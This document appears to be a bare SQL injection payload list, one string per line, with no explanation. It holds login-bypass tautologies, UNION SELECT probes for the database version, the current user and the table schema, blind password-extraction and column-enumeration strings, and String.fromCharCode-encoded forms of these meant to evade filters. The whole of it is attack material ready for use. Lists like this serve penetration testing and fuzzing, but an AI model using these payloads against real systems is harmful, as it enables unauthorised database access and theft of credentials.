 and 1=1
 and 1=1–
 like '%'
 or 0=0 #
 or 0=0 --
 or 0=0 –
 or 1=1
 or 1=1#
 or 1=1--
 or 1=1/*
 or 1=1–
 or true
" #
" --
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
" or ""="
" or "1"="1
" or "1"="1"#
" or "1"="1"--
" or "1"="1"/*
" or "a"="a
" or "x"="x
" or 0=0 #
" or 0=0 --
" or 0=0 –
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1#
" or 1=1--
" or 1=1/*
" or 1=1–
") or "1"="1
") or "1"="1"#
") or "1"="1"--
") or "1"="1"/*
") or ("1"="1
") or ("1"="1"#
") or ("1"="1"--
") or ("1"="1"/*
") or ("a"="a
"/*
"or 1=1 or ""="
%' or '0'='0
'
' #
' --
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
' OR 'x'='x'#;
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
' and 'one'='one
' and 'one'='one–
' and 1='1
' and a='a
' and substring(password/text(),1,1)='7
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
' or         0=0 #
' or ''='
' or '1'='1
' or '1'='1'#
' or '1'='1'--
' or '1'='1'/*
' or '1′='1
' or 'a'='a
' or 'one'='one
' or 'one'='one–
' or 'x'='x
' or 0=0 #
' or 0=0 --
' or 0=0 –
' or 1=1
' or 1=1 --
' or 1=1 LIMIT 1;#
' or 1=1 –
' or 1=1#
' or 1=1--
' or 1=1/*
' or 1=1;#
' or 1=1–
' or a=a--
' or a=a–
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
' –
'#
') or '1'='1
') or '1'='1'#
') or '1'='1'--
') or '1'='1'/*
') or '1'='1--
') or ('1'='1
') or ('1'='1'#
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1--
') or ('a'='a
') or ('a'='a and hi") or ("a"="a
') or ('x'='x
'--
'/*
'=' 'or' and '=' 'or'
'or 1=1 or ''='
'or'1=1
'or'1=1'
'or'1=1′
) or '1′='1–
) or ('1′='1–
1′) and '1′='1–
=
==
A"-"A"+1-1 #
A"-"A"+1-1 --A'-'A'+1-1 #
A'-'A'+1-1 --
String.fromCharCode(104, 105, 34, 32, 111, 114, 32, 34, 97, 34, 61, 34, 97)
String.fromCharCode(104, 105, 34, 32, 111, 114, 32, 49, 61, 49, 32, 45, 45)
String.fromCharCode(104, 105, 39, 32, 111, 114, 32, 49, 61, 49, 32, 45, 45)
String.fromCharCode(111, 114, 32, 48, 61, 48, 32, 35)
String.fromCharCode(111, 114, 32, 48, 61, 48, 32, 45, 45)
String.fromCharCode(111, 114, 32, 49, 61, 49, 45, 45)
String.fromCharCode(34, 32, 111, 114, 32, 34, 120, 34, 61, 34, 120)
String.fromCharCode(34, 32, 111, 114, 32, 34, 97, 34, 61, 34, 97)
String.fromCharCode(34, 32, 111, 114, 32, 48, 61, 48, 32, 35)
String.fromCharCode(34, 32, 111, 114, 32, 48, 61, 48, 32, 45, 45)
String.fromCharCode(34, 32, 111, 114, 32, 49, 61, 49, 45, 45)
String.fromCharCode(34, 41, 32, 111, 114, 32, 40, 34, 97, 34, 61, 34, 97)
String.fromCharCode(39, 111, 114, 39, 49, 61, 49, 39)
String.fromCharCode(39, 32, 111, 114, 32, 39, 120, 39, 61, 39, 120)
String.fromCharCode(39, 32, 111, 114, 32, 39, 49, 39, 61, 39, 49)
String.fromCharCode(39, 32, 111, 114, 32, 48, 61, 48, 32, 35)
String.fromCharCode(39, 32, 111, 114, 32, 48, 61, 48, 32, 45, 45)
String.fromCharCode(39, 32, 111, 114, 32, 49, 61, 49, 45, 45)
String.fromCharCode(39, 32, 111, 114, 32, 97, 61, 97, 45, 45)
String.fromCharCode(39, 41, 32, 111, 114, 32, 40, 39, 120, 39, 61, 39, 120)
String.fromCharCode(39, 41, 32, 111, 114, 32, 40, 39, 97, 39, 61, 39, 97)
admin' and substring(password/text(),1,1)='7
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
or 0=0 #
or 0=0 --
or 1=1--
